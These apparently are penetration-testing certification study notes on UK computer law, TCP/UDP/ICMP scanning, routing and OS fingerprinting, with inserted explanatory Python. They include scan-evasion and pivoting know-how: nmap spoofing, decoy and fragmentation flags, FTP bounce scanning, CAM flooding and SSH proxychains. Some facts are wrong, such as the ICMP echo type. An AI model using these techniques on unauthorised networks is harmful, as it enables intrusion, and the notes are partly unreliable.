Appendix A: Soft Skills and Assessment Management
A1 - Engagement Lifecycle
- Benefits and utility of penetration testing to the client.
- Structure of penetration testing, including the relevant processes and procedures.
- Concepts of infrastructure testing and application testing, including black box and white box formats.
- Project closure and debrief.
A2 - Law & Compliance
Knowledge of pertinent UK legal issues:
- Computer Misuse Act 1990
"Unauthorised access" is the key term: it means you need permission.
Under the Computer Misuse Act 1990, the following are offences:
  - Unauthorised access to computer material (section 1);
  - Unauthorised access with intent to commit or facilitate commission of further offences (section 2); and
  - Unauthorised modification of computer material (section 3).
These offences are potentially wide in scope: even guessing the password to access someone else's webmail account could be prosecuted as an offence of unauthorised access to computer material.
When companies commission penetration testing, a contract should be signed before testing begins, to ensure that the testing company's actions are authorised. It should also deal with liability issues: what happens if the tester takes down a critical part of the organisation's website and the organisation suffers loss? Ensure you do not go out of scope (follow redirects?).
The Act was amended by The Police and Justice Act 2006, which increased the penalties.
- Human Rights Act 1998
Everyone has the right to respect for his private and family life, his home and his correspondence. There shall be no interference by a public authority with the exercise of this right except such as is in accordance with the law and is necessary in a democratic society in the interests of national security, public safety or the economic well-being of the country, for the prevention of disorder or crime, for the protection of health or morals, or for the protection of the rights and freedoms of others.
- Data Protection Act 1998
Section 55 – Unlawful obtaining of personal data. This section makes it an offence for people outside the organisation ("other parties"), such as hackers and impersonators, to obtain unauthorised access to the personal data.
Ensure you do not keep any records that would fall under the Act for longer than is necessary, i.e. prove the data is accessible and do not back up those records. Data controllers may want to employ you to test that they have appropriate measures in place to secure the data.
- Police and Justice Act 2006
  - Makes amendments to the Computer Misuse Act 1990.
  - Increased the penalties of the Computer Misuse Act (makes unauthorised computer access serious enough to fall under extradition).
  - Made it illegal to perform denial-of-service (DoS) attacks. Such attacks were banned in Scotland in 2007 and in England and Wales in 2008, when section 3 of the Computer Misuse Act was amended (by the Police and Justice Act 2006).
  - Made it illegal to supply and own hacking tools.
Impact of this legislation on penetration testing activities. Awareness of sector-specific regulatory issues.
Appendix B: Core Technical Skills
B1 - IP Protocols
LITA – Link Layer, Internet Layer, Transport Layer, Application Layer
Traceroute
- Traceroute tracks the route packets have taken from an IP network on their way to a given host. It utilises the IP protocol's time to live (TTL) field and attempts to elicit an ICMP TIME_EXCEEDED response from each gateway along the path to the host.
- We start our probes with a TTL of one and increase by one until we get an "ICMP port unreachable" (or TCP reset), which means we got to the host, or hit a maximum (which defaults to 30 hops).
- We don't want the destination host to process the UDP probe packets, so the destination port is set to an unlikely value (you can change it with the -p flag). There is no such problem for ICMP or TCP tracerouting (for TCP we use the half-open technique, which prevents our probes from being seen by applications on the destination host).
- Probe packets are UDP datagrams with so-called "unlikely" destination ports. The "unlikely" port of the first probe is 33434, then for each subsequent probe it is incremented by one. Since the ports are expected to be unused, the destination host normally returns "ICMP port unreachable" as a final response.
- Can also use -I (ICMP), which uses ICMP echo packets for probes, or -T (TCP, using the half-open technique), which uses a constant destination port (default is 80, HTTP).
TTL
- See OS Fingerprinting below. The time-to-live (TTL) is the number of hops that a packet is permitted to travel before being discarded by a router.
- The TTL is set in an eight-bit field in the packet header by the sending host and is used to prevent packets from endlessly circulating on the Internet or another network.
- When forwarding an IP packet, routers are required to decrease the TTL by at least one (to prevent routing loops). If a packet's TTL field reaches zero, the router detecting it discards the packet and sends an ICMP message back to the originating host: "TTL expired in transit".
- The ping and traceroute utilities both make use of the TTL. The latter intentionally sends packets with low TTL values so that they will be discarded by each successive router in the destination path. The time between sending a packet and receiving the ICMP message that it was discarded is used to calculate the travel time for each successive hop.
- A specific TTL number can indicate the maximum range for a packet. For example, zero restricts it to the same host, one to the same subnet, 32 to the same site, 64 to the same region and 128 to the same continent; 255 is unrestricted.
- Default TTL values:
  Linux: 64
  FreeBSD: 64
  Windows: 128
  Cisco: 255
IPv4
- IPv4 is a connectionless protocol for use on packet-switched networks. It operates on a best-effort delivery model, in that it does not guarantee delivery, nor does it assure proper sequencing or avoidance of duplicate delivery.
- IPv4 uses 32-bit addresses, which limits the address space to 4294967296 (2^32) addresses.
- IPv4 reserves special address blocks for private networks (~18 million addresses) and multicast addresses (~270 million addresses).
IPv6
- IPv6 uses a 128-bit address, theoretically allowing 2^128, or approximately 3.4×10^38, addresses. The actual number is slightly smaller, as multiple ranges are reserved for special use or completely excluded from use. The total number of possible IPv6 addresses is more than 7.9×10^28 times as many as IPv4, which uses 32-bit addresses and provides approximately 4.3 billion addresses. The two protocols are not designed to be interoperable, complicating the transition to IPv6. However, several IPv6 transition mechanisms have been devised to permit communication between IPv4 and IPv6 hosts.
- Research has shown that the use of fragmentation can be leveraged to evade network security controls. As a result, RFC 7112 requires that the first fragment of an IPv6 packet contains the entire IPv6 header chain, such that some very pathological fragmentation cases are forbidden.
TCP
- 65535 TCP ports
- TCP provides reliable, ordered, and error-checked delivery of a stream of octets (bytes) between applications running on hosts communicating by an IP network. Major Internet applications such as the World Wide Web, email, remote administration, and file transfer rely on TCP.
- Scanning exchanges: vanilla (full connect): SYN, SYN/ACK, ACK. Port closed: SYN, RST/ACK. Half open: SYN, SYN/ACK, RST.
Inverse TCP Scanning
- Stealth scanning – use malformed TCP requests, because responses are only sent back by closed ports.
- RFC 793 – if a port is closed, an RST/ACK packet should be sent to close the connection (an open port will not respond (but it will with SYN ACK?), hence if there is no response then the port is open or the server is down). MS systems disregard RFC 793, so it only works against *nix systems.
- Attacker can send:
  - A FIN TCP packet
  - An XMAS probe with the FIN, URG, and PUSH TCP flags set
  - A NULL probe with no TCP flags set
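As an added example (not part of the original notes), the following Python maps a TCP flag byte to the probe types listed above, applies the RFC 793 reply logic the notes describe (RST/ACK means closed, silence means open or filtered, and Windows stacks answer RST either way so the result there is ambiguous), and tallies NULL/FIN/XMAS probes per source over a few constructed flow records, which is the shape of a simple detection rule for inverse scans. The flag bit values are the standard TCP header bits; the addresses, ports and records are constructed for the example.

```python
# Added example: classify TCP probes by flag bits and interpret replies per RFC 793.
# Flag bit values are the standard TCP header bits; sample records are constructed.
from typing import Dict, List, Optional

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = {FIN: "FIN", SYN: "SYN", RST: "RST", PSH: "PSH", ACK: "ACK", URG: "URG"}


def flag_string(flags: int) -> str:
    """Render a flag byte as e.g. 'FIN|PSH|URG' (empty string when no flags are set)."""
    return "|".join(name for bit, name in FLAG_NAMES.items() if flags & bit)


def classify_probe(flags: int) -> str:
    """Name the probe type implied by the flags of the first packet seen to a port."""
    if flags == 0:
        return "NULL"
    if flags == FIN:
        return "FIN"
    if flags == FIN | PSH | URG:
        return "XMAS"
    if flags == SYN:
        return "SYN"
    if flags == ACK:
        return "ACK"
    return "other"


def infer_port_state(reply_flags: Optional[int], target_is_windows: bool = False) -> str:
    """RFC 793 logic for inverse scans: RST/ACK => closed; no reply => open or filtered.
    Windows stacks reply with RST regardless of port state, so the answer is ambiguous there."""
    if target_is_windows:
        return "unknown (stack replies RST for open and closed ports)"
    if reply_flags is None:
        return "open|filtered"
    if reply_flags & RST:
        return "closed"
    return "unexpected reply"


def count_inverse_probes(records: List[dict]) -> Dict[str, Dict[str, int]]:
    """Tally NULL/FIN/XMAS probes per source IP: a burst from one source is a scan signal."""
    tally: Dict[str, Dict[str, int]] = {}
    for r in records:
        kind = classify_probe(r["flags"])
        if kind in ("NULL", "FIN", "XMAS"):
            per_src = tally.setdefault(r["src"], {})
            per_src[kind] = per_src.get(kind, 0) + 1
    return tally


# Constructed sample flow records (documentation-range addresses, hypothetical ports).
SAMPLE_RECORDS = [
    {"src": "192.0.2.10", "dst": "198.51.100.5", "dport": 22, "flags": 0},
    {"src": "192.0.2.10", "dst": "198.51.100.5", "dport": 80, "flags": FIN | PSH | URG},
    {"src": "192.0.2.10", "dst": "198.51.100.5", "dport": 443, "flags": FIN},
    {"src": "192.0.2.20", "dst": "198.51.100.5", "dport": 80, "flags": SYN},
    {"src": "192.0.2.20", "dst": "198.51.100.5", "dport": 80, "flags": ACK},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["src"], rec["dport"], flag_string(rec["flags"]) or "(none)", "->", classify_probe(rec["flags"]))
    print(count_inverse_probes(SAMPLE_RECORDS))
    print(infer_port_state(RST | ACK), infer_port_state(None))
```

Run over the sample, 192.0.2.10 shows one NULL, one XMAS and one FIN probe while 192.0.2.20 (a normal SYN and ACK) is not counted at all; that asymmetry is what makes flag-combination counting a cheap first-pass detector.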
FTP Bounce Scanning – FTP Port
- Kind of like an old SSRF. There is a flaw in the way some FTP servers handle the PORT command. Once logged into the server, enter passive mode (QUOTE PASV), after which a PORT command is issued telling the FTP service to connect to a specific port on a target server (PORT 144,51,17,230,0,23 will attempt to connect to 144.51.17.230 port 23), followed by a LIST command.
- If a 226 response is received then the target port is open; if 425, the connection has been refused.
UDP
- Applications that do not require a reliable data stream service may use the User Datagram Protocol (UDP), which provides a connectionless datagram service that emphasises reduced latency over reliability.
- With UDP, computer applications can send messages, in this case referred to as datagrams, to other hosts on an Internet Protocol (IP) network. Prior communications are not required in order to set up communication channels or data paths.
- UDP uses a simple connectionless communication model with a minimum of protocol mechanism. UDP provides checksums for data integrity, and port numbers for addressing different functions at the source and destination of the datagram. It has no handshaking dialogues, and thus exposes the user's program to any unreliability of the underlying network; there is no guarantee of delivery, ordering, or duplicate protection.
- Scanning: since UDP is connectionless, you only have two options. Send a probe to all 65535 ports and wait for ICMP destination port unreachable to identify ports which are not accessible, or send specific application requests (SNMP, dig, TFTP) and await a response (as these responses are processed by the application and not the TCP/IP stack).
- Port open: UDP probe packet – no response. Port closed: UDP probe packet – the host sends ICMP Destination Port Unreachable. This negative scanning allows one to infer which ports are open (as they don't send messages). nmap -sU
ICMP
- The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite.
- The ICMP header starts after the IPv4 header and is identified by IP protocol number 1. All ICMP packets have an 8-byte header and a variable-sized data section. The first 4 bytes of the header have a fixed format, while the last 4 bytes depend on the type/code of that ICMP packet.
- Code 00 is ping reply, 51 is host redirect.
- Useful ICMP messages:
  - Echo Request – ping packet (Type 7, Type 0 is reply)
  - Timestamp Request – in decimal format, representing time elapsed since midnight GMT (Type 13, 14 is reply)
  - Information Request (Type 15) – RARP, BOOTP, DHCP
  - Subnet Address Mask Request (Type 17, Type 18 is reply)
  - Parameter Problem (Type 12)
  - Time Exceeded (Type 11)
  - Redirect (Type 5)
  - Source Quench (Type 4)
  - Destination Unreachable (Type 3)
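The following Python is an added example, not code from the original notes. It builds and parses the 8-byte ICMP header described above (type, code, checksum, four type-specific bytes) with the RFC 1071 one's-complement checksum, then interprets replies the way the Traceroute and UDP scanning sections describe: Time Exceeded from each router, Destination Unreachable / Port Unreachable from the destination, and silence meaning open or filtered for a UDP probe. The type constants follow RFC 792 (Echo Request is type 8, Echo Reply type 0). Everything is constructed in memory; nothing is sent on the network, and the simulated path is an assumption.

```python
# Added example: build and parse ICMP headers with the RFC 1071 checksum, then interpret
# the replies a traceroute or UDP probe would see. Type numbers follow RFC 792.
# All packets below are constructed in memory; nothing is sent.
import struct
from typing import List, Optional, Tuple

ECHO_REPLY, DEST_UNREACH, ECHO_REQUEST, TIME_EXCEEDED = 0, 3, 8, 11
PORT_UNREACHABLE = 3          # code under Destination Unreachable
TYPE_NAMES = {0: "Echo Reply", 3: "Destination Unreachable", 4: "Source Quench", 5: "Redirect",
              8: "Echo Request", 11: "Time Exceeded", 12: "Parameter Problem",
              13: "Timestamp Request", 14: "Timestamp Reply", 15: "Information Request",
              17: "Address Mask Request", 18: "Address Mask Reply"}


def inet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words (zero-padded to even length), complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, code: int, rest: bytes = b"\x00" * 4, payload: bytes = b"") -> bytes:
    """8-byte header: type, code, checksum, 4 type-specific bytes; checksum covers header + payload."""
    body = struct.pack("!BBH", icmp_type, code, 0) + rest + payload
    return struct.pack("!BBH", icmp_type, code, inet_checksum(body)) + rest + payload


def build_echo_request(ident: int, seq: int, payload: bytes = b"") -> bytes:
    """Echo Request: the type-specific bytes carry identifier and sequence number."""
    return build_icmp(ECHO_REQUEST, 0, struct.pack("!HH", ident, seq), payload)


def parse_icmp(packet: bytes) -> dict:
    """Split an ICMP message; 'valid' is True when the checksum over the whole message folds to 0."""
    icmp_type, code, checksum = struct.unpack("!BBH", packet[:4])
    return {"type": icmp_type, "name": TYPE_NAMES.get(icmp_type, "unknown"), "code": code,
            "checksum": checksum, "valid": inet_checksum(packet) == 0,
            "rest": packet[4:8], "payload": packet[8:]}


def classify_traceroute_reply(reply: Optional[bytes]) -> str:
    """What a UDP traceroute learns from one probe: router, destination, timeout or bad checksum."""
    if reply is None:
        return "timeout"                     # printed as * * * by traceroute
    info = parse_icmp(reply)
    if not info["valid"]:
        return "bad-checksum"
    if info["type"] == TIME_EXCEEDED:
        return "router"
    if info["type"] == DEST_UNREACH and info["code"] == PORT_UNREACHABLE:
        return "destination"                 # the "unlikely" UDP port was closed, as expected
    if info["type"] == ECHO_REPLY:
        return "destination"                 # ICMP-mode traceroute (-I)
    return "other"


def infer_udp_port_state(reply: Optional[bytes]) -> str:
    """UDP scan interpretation: port unreachable => closed; silence => open or filtered."""
    if reply is None:
        return "open|filtered"
    info = parse_icmp(reply)
    if info["type"] == DEST_UNREACH and info["code"] == PORT_UNREACHABLE:
        return "closed"
    return "filtered"                        # other unreachable codes: admin prohibited etc.


def simulate_traceroute(path_length: int, max_ttl: int = 30) -> List[Tuple[int, str]]:
    """Constructed path: routers answer Time Exceeded until the TTL reaches the destination,
    which answers Port Unreachable; the probe loop stops there or at max_ttl (default 30)."""
    results = []
    for ttl in range(1, max_ttl + 1):
        if ttl < path_length:
            reply = build_icmp(TIME_EXCEEDED, 0)
        else:
            reply = build_icmp(DEST_UNREACH, PORT_UNREACHABLE)
        results.append((ttl, classify_traceroute_reply(reply)))
        if results[-1][1] == "destination":
            break
    return results


if __name__ == "__main__":
    pkt = build_echo_request(0x1234, 1, b"abc")
    print(pkt.hex(), parse_icmp(pkt))
    print(simulate_traceroute(5))
```

For the echo request with identifier 0x1234 and sequence 1 and no payload the checksum field is 0xE5CA, and re-summing the finished message folds to zero, which is the check a receiver performs; flipping any bit of a captured reply makes `parse_icmp` report it invalid.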
Awareness that other IP protocols exist.
B2 - Network Architectures
Varying networks types that could be encountered during a penetration test:
CAT 5 / Fibre
- Category 5 cable, commonly referred to as Cat 5, is a twisted-pair cable for computer networks. The cable standard provides performance of up to 100 MHz and is suitable for most varieties of Ethernet over twisted pair. Cat 5 is also used to carry other signals such as telephony and video.
- Optical fibre transmits signals as light rather than electricity. Light is the fastest means of transmitting information, which suits businesses that need speed, and because fibre optic cabling carries a much cleaner signal than conventional copper cabling, it can transmit at higher rates.
10/100/1000baseT
Definition of: 10/100 Ethernet - An Ethernet network transmitting at 10 and 100 Mbps. Very old computers are
limited to 10 Mbps, and most computers support 10/100 or 10/100/1000 (Gigabit Ethernet).
1000Base-T is a type of gigabit Ethernet networking technology that uses copper cables as a medium. 1000Base-T
uses four pairs of Category 5 unshielded twisted pair cables to achieve gigabit data rates. The standard is designated
as IEEE 802.3ab and allows 1 Gbps data transfers for distances of up to 330 feet.
Fast Ethernet is a collective term for a number of Ethernet standards that carry traffic at the nominal rate of
100 Mbit/s (the earlier Ethernet speed was 10 Mbit/s). Of the Fast Ethernet standards, 100BASE-TX is by far the most
common.
Token ring
Token Ring local area network (LAN) technology is a communications protocol for local area networks. It uses a
special three-byte frame called a "token" that travels around a logical "ring" of workstations or servers. This token
passing is a channel access method providing fair access for all stations and eliminating the collisions of contention-
based access methods.
Wireless (802.11)
IEEE 802.11 is a set of media access control (MAC) and physical layer (PHY) specifications for implementing wireless
local area network (WLAN) computer communication in the 900 MHz and 2.4, 3.6, 5, and 60 GHz frequency bands.
Security implications of shared media, switched media and VLANs.
Collision domain: a set of LAN devices whose frames could collide with one another.
Broadcast domain: a broadcast domain can also be seen as a collision domain. It is a set of devices such that when one device sends a broadcast frame, all other devices in the same broadcast domain receive that frame.
- Hub: a hub works at L1 of the OSI model. Only one data packet can pass through the hub at a time. Many collisions occur, because there is only one collision domain.
- Switch: supports simultaneous connections and sends traffic only to the destination port. This is done with the help of ARP (Address Resolution Protocol), whose main job is to convert IP addresses to MAC addresses. Access switches or L2 switches operate at L2 (data link layer), on source MAC and destination MAC.
- Routers: work at L3 of the OSI model. Routers don't propagate broadcast traffic; two different subnets/LANs/networks communicate through a router via routing protocols. Routers take and forward "unicast" traffic. Each interface present on a router gives rise to a broadcast domain.
Bridges and hubs = 1 broadcast domain and 1 collision domain.
Switch = 1 broadcast domain per VLAN and 1 collision domain per port.
Routers = 1 broadcast domain and 1 collision domain per port.
CAM Table Overflow
Ethernet switches use Content Addressable Memory (CAM) tables to map MAC addresses and VLAN assignments to
individual ports, so that network frames are delivered correctly. The macof utility can be used to flood a switch with
random Ethernet frames resulting in a CAM overflow. The switch will fail open and broadcast them to all ports
(becoming a hub)
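As an added example (not from the original notes, and purely a simulation), here is a toy switch model in Python that shows the fail-open behaviour above: once the CAM table is full and a legitimate entry ages out, frames to that host are flooded to every port like a hub. The same model with a per-port MAC limit (the usual port-security control) shuts the offending port after a handful of addresses, so the table never fills and unicast delivery keeps working. The capacity of 1024 entries, the MAC addresses and the burst sizes are constructed.

```python
# Added example: a toy switch model showing why a full CAM table "fails open" and how a
# per-port MAC limit (port security) contains it. Purely a simulation; MACs are constructed.
from collections import OrderedDict
from typing import Optional, Union


class ToySwitch:
    def __init__(self, cam_capacity: int, max_macs_per_port: Optional[int] = None):
        self.cam: "OrderedDict[str, int]" = OrderedDict()   # MAC -> port
        self.capacity = cam_capacity
        self.limit = max_macs_per_port                      # None = no port security
        self.err_disabled = set()                           # ports shut by a violation
        self.flooded = 0                                    # frames sent out of every port

    def macs_on_port(self, port: int) -> int:
        return sum(1 for p in self.cam.values() if p == port)

    def learn(self, src_mac: str, port: int) -> bool:
        """Record source MAC -> ingress port. Returns False if nothing was learned."""
        if port in self.err_disabled:
            return False
        if src_mac in self.cam:
            self.cam[src_mac] = port         # refresh an existing entry
            return True
        if self.limit is not None and self.macs_on_port(port) >= self.limit:
            self.err_disabled.add(port)      # port-security violation: shut the port
            return False
        if len(self.cam) >= self.capacity:
            return False                     # table full: no new hosts can be learned
        self.cam[src_mac] = port
        return True

    def age_out(self, mac: str) -> None:
        """Normal CAM ageing removes an entry that has not been refreshed."""
        self.cam.pop(mac, None)

    def forward(self, dst_mac: str) -> Union[int, str]:
        """Egress port for a frame, or 'FLOOD' (sent to all ports, hub-like) if unknown."""
        port = self.cam.get(dst_mac)
        if port is None:
            self.flooded += 1
            return "FLOOD"
        return port


def cam_overflow_scenario(max_macs_per_port: Optional[int]) -> dict:
    """A legitimate host on port 1, a burst of bogus source MACs on port 3, the legitimate entry
    ages out while the burst continues, then the host speaks again. Can it still be delivered to?"""
    sw = ToySwitch(cam_capacity=1024, max_macs_per_port=max_macs_per_port)
    legit = "00:11:22:33:44:55"
    sw.learn(legit, port=1)
    bogus = ["02:00:00:00:%02x:%02x" % (i >> 8, i & 0xFF) for i in range(1600)]  # constructed
    for mac in bogus[:1500]:
        sw.learn(mac, port=3)
    sw.age_out(legit)
    for mac in bogus[1500:]:                 # burst continues after the entry ages out
        sw.learn(mac, port=3)
    relearned = sw.learn(legit, port=1)
    return {"cam_entries": len(sw.cam), "relearned": relearned,
            "delivery": sw.forward(legit), "port3_disabled": 3 in sw.err_disabled}


if __name__ == "__main__":
    print("no port security :", cam_overflow_scenario(None))
    print("limit 5 MACs/port:", cam_overflow_scenario(5))
```

Without a limit the table ends full (1024 entries), the legitimate host cannot be re-learned and its frames are flooded; with a limit of five MACs per port, port 3 is error-disabled after its fifth address, the table holds six entries and delivery to port 1 continues.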
B3 - Network Routing
RIP
The Routing Information Protocol (RIP) is one of the oldest distance-vector routing protocols, and it employs the hop count as its routing metric. RIP prevents routing loops by implementing a limit on the number of hops allowed in a path from source to destination. The largest number of hops allowed for RIP is 15, which limits the size of networks that RIP can support.
In RIPv1, routers broadcast updates containing their routing table every 30 seconds (UDP port 520).
A hop count of 1 denotes a network that is directly connected to the router. 16 hops denotes a network that is unreachable, according to the RIP hop limit.
Due to the deficiencies of the original RIP specification, RIP version 2 (RIPv2) was developed in 1993 and last standardised in 1998 in RFC 2453. It included the ability to carry subnet information, thus supporting Classless Inter-Domain Routing (CIDR). To maintain backward compatibility, the hop count limit of 15 remained.
OSPF
Open Shortest Path First (OSPF) uses a link state routing (LSR) algorithm and falls into the group of interior gateway
protocols (IGPs), operating within a single autonomous system (AS). OSPF supports the Classless Inter-Domain
Routing (CIDR) addressing model.
OSPF is a widely used IGP in large enterprise networks.
IGRP
Interior Gateway Routing Protocol (IGRP) is a distance vector interior gateway protocol (IGP) developed by Cisco. It is
used by routers to exchange routing data within an autonomous system.
IGRP is a proprietary protocol. IGRP was created in part to overcome the limitations of RIP (maximum hop count of
only 15, and a single routing metric) when used within large networks. IGRP supports multiple metrics for each
route, including bandwidth, delay, load, and reliability; to compare two routes these metrics are combined together
into a single metric, using a formula which can be adjusted through the use of pre-set constants. The maximum
configurable hop count of IGRP-routed packets is 255 (default 100), and routing updates are broadcast every 90
seconds (by default). IGRP uses protocol number 9 for communication.
IGRP is considered a classful routing protocol. Because the protocol has no field for a subnet mask, the router
assumes that all subnetwork addresses within the same Class A, Class B, or Class C network have the same subnet
mask as the subnet mask configured for the interfaces in question. This contrasts with classless routing protocols
that can use variable length subnet masks. Classful protocols have become less popular as they are wasteful of IP
address space.
EIGRP
Enhanced Interior Gateway Routing Protocol (EIGRP) is an advanced distance-vector routing protocol that is used on a computer network for automating routing decisions and configuration. The protocol was designed by Cisco Systems as a proprietary protocol, available only on Cisco routers. Partial functionality of EIGRP was converted to an open standard in 2013 and was published with informational status as RFC 7868 in 2016.
EIGRP is used on a router to share routes with other routers within the same autonomous system. Unlike other well
known routing protocols, such as RIP, EIGRP only sends incremental updates, reducing the workload on the router
and the amount of data that needs to be transmitted.
EIGRP replaced the Interior Gateway Routing Protocol (IGRP) in 1993. One of the major reasons for this was the
change to classless IPv4 addresses in the Internet Protocol, which IGRP could not support.
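To make the "single metric versus composite metric" contrast in the RIP and IGRP sections concrete, here is an added Python example (not from the original notes) that implements Cisco's published composite metric for IGRP, with its K1..K5 constants at their defaults, and the EIGRP variant that scales the same result by 256. Two constructed paths are compared: RIP prefers the single-hop T1 link, while IGRP/EIGRP prefer the two-hop Fast Ethernet path because it is far faster. The link bandwidth and delay figures are constructed.

```python
# Added example: Cisco's composite metric for IGRP (and EIGRP, which scales it by 256)
# compared with RIP's hop count on two constructed paths. The formula and default K values
# are the published Cisco ones; the link figures are constructed for the example.
from typing import Callable, List, Tuple

DEFAULT_K = (1, 0, 1, 0, 0)          # K1..K5: bandwidth and delay only, by default


def composite_metric(min_bandwidth_kbps: int, total_delay_us: int, load: int = 1,
                     reliability: int = 255, k: Tuple[int, ...] = DEFAULT_K,
                     eigrp: bool = False) -> int:
    """IGRP: metric = K1*BW + K2*BW/(256-load) + K3*DLY, scaled by K5/(REL+K4) when K5 != 0.
    BW = 10^7 / slowest link in kbps; DLY = summed delay in tens of microseconds.
    EIGRP uses the same formula multiplied by 256."""
    k1, k2, k3, k4, k5 = k
    bw = 10_000_000 // min_bandwidth_kbps
    dly = total_delay_us // 10
    metric = k1 * bw + (k2 * bw) // (256 - load) + k3 * dly
    if k5 != 0:
        metric = metric * k5 // (reliability + k4)
    return metric * 256 if eigrp else metric


def path_metric(links: List[Tuple[int, int]], eigrp: bool = False) -> int:
    """links: (bandwidth_kbps, delay_us) per hop; bandwidth is the path minimum, delay the sum."""
    return composite_metric(min(bw for bw, _ in links), sum(d for _, d in links), eigrp=eigrp)


def rip_metric(links: List[Tuple[int, int]]) -> int:
    """RIP sees only the hop count; anything beyond 15 hops is reported as 16 (unreachable)."""
    return len(links) if len(links) <= 15 else 16


# Constructed paths: A = two Fast Ethernet hops, B = one T1 hop.
PATH_A = [(100_000, 100), (100_000, 100)]
PATH_B = [(1_544, 20_000)]


def best_path(protocol: str) -> str:
    """Return which of the two constructed paths the named protocol would install."""
    scorer: Callable[[List[Tuple[int, int]]], int]
    if protocol == "rip":
        scorer = rip_metric
    else:
        scorer = lambda p: path_metric(p, eigrp=(protocol == "eigrp"))
    return "A" if scorer(PATH_A) < scorer(PATH_B) else "B"


if __name__ == "__main__":
    for proto in ("rip", "igrp", "eigrp"):
        print(proto, "prefers path", best_path(proto))
    print("T1 IGRP metric:", composite_metric(1_544, 20_000), "EIGRP:", composite_metric(1_544, 20_000, eigrp=True))
```

A single T1 hop (1544 kbps, 20000 µs) gives the familiar IGRP value 8476 and EIGRP value 2169856, while the two-hop Fast Ethernet path scores 120 under IGRP; RIP, counting hops only, ranks them the other way round.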
B4 - Network Mapping & Target Identification
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Traceroute to port
traceroute -T -p 80 x.x.x.x (where -p 80 sets the destination port; you sometimes get a different route to 443).
nping --tr, --traceroute: traceroute mode (can only be used with TCP/UDP/ICMP modes).
nmap -sn (-sP) – no port scan after host discovery; -Pn – no ping, i.e. skip host discovery.
Windows tracert – the TRACERT diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination.
In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. Because each router along the path is required to decrement the packet's TTL by at least 1 before forwarding the packet, the TTL is effectively a hop counter. When the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source computer. (contrast ICMP message with Traceroute – same?)
Linux traceroute – see above.
Network sweeping techniques to prioritise a target list and the potential for false negatives.
Ping sweep?
As RPC uses high ephemeral ports, some port scanners incorrectly identify the open port as a different service if they only identify services via the port number. You can eliminate this by using nmap's -sR flag.
B6 - Filtering Avoidance Techniques
The importance of egress and ingress filtering, including the risks associated with outbound connections.
Egress filtering is a basic principle that should be implemented at every organization to prevent hacking activity from
leaving your network.
We always do ingress filtering. That is, we only allow trusted and known traffic into the firewall from the
internet. This traffic is typically allowed into a DMZ and then traffic from the DMZ is allowed through to the internal
network. This traffic is allowed only from selected IP addresses and specific ports. Everything else is blocked.
B7 - Packet Crafting
Packet crafting to meet a particular requirement:
Modifying source ports, Spoofing Source (S) IP addresses, Manipulating TTL’s, Fragmentation
Nmap [1]
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu <val>: fragment packets (optionally with the given MTU)
-S <IP_Address>: spoof source address
-g/--source-port <portnum>: use the given port number
--ttl <val>: set IP time-to-live field
-D <decoy1,decoy2[,ME],...>: cloak a scan with decoys
-sS: TCP SYN scan
-sT: TCP connect scan
-sU: UDP scan
-sV: version detection
-sA: TCP ACK port scan
-sP: no port scan
-p <port ranges>: e.g. -p U:53,111,137,T:21-25,80,139,8080 (exam tried to confuse with -p0)
-Pn: no ping (exam tried to confuse with -p0; lower vs upper case P)
-sn: host discovery only – no port scanning
Nmap Proxy Chaining
Create a proxy via SSH to scan from your client to a target located on a network which the SSH server can access. The command below will create a tunnel starting at port 9050 on my local host to the target machine, 192.168.217.144. The -N and -f indicate that I do not want to run a command and want to fork into the background. I chose port 9050 because it is the default port for the proxychains tool.
ssh username@192.168.217.144 -D 9050 -N -f
Now that the tunnel is set up I can scan the internal network looking for web servers:
proxychains nmap -n -sT -p 80 192.168.217.0/24
[1] https://nmap.org/book/man-briefoptions.html
Generating ICMP packets
Ping generates ICMP. Nmap does it with more options:
nmap -sP -PE scanme.nmap.org
-PE/-PP/-PM: ICMP echo, timestamp, and netmask request discovery probes
Ping Broadcast
The last address in a subnet (all host bits set) is reserved as the broadcast address, which is used to send traffic to all hosts within the subnet.
ping -b 10.10.5.255
You can also send a broadcast to other subnets:
ping -b 255.255.255.255
B8 - OS Fingerprinting
Remote operating system fingerprinting; active and passive techniques.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
- Active fingerprinting works by sending packets to a target and analysing the packets that are sent back.
- Passive fingerprinting sniffs TCP/IP ports, rather than generating network traffic by sending packets to them. Hence, it's a more effective way of avoiding detection or being stopped by a firewall. While sniffing traffic, passive fingerprinting does its best to determine a target machine's OS by analysing the initial Time to Live (TTL) in packet IP headers, and the TCP window size in the first packet of a TCP session, which is usually either a SYN (synchronise) or SYN/ACK (synchronise and acknowledge) packet.
- Understanding TTL to map OS: 123 is near 128, which is the default for Windows, so it is likely a Windows host which is 5 hops away, as each hop reduces the TTL by one (https://subinsb.com/default-device-ttl-values).
When used in ping, the TTL of the remote host is returned. In the example below, for theguardian.co.uk, ping returns a TTL of 60. (Linux default: 64/255)
Pinging theguardian.co.uk [151.101.0.233] with 32 bytes of data:
Reply from 151.101.0.233: bytes=32 time=15ms TTL=60
…when we trace to the same host we see it is 5 hops, but the first hop does not count as it is from localhost to the router and the TTL only decrements from the router. Hence 4 hops are added to the 60 we have, giving a TTL of 64, meaning a Unix host.
ping -4 localhost # -4 forces IPv4 usage
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
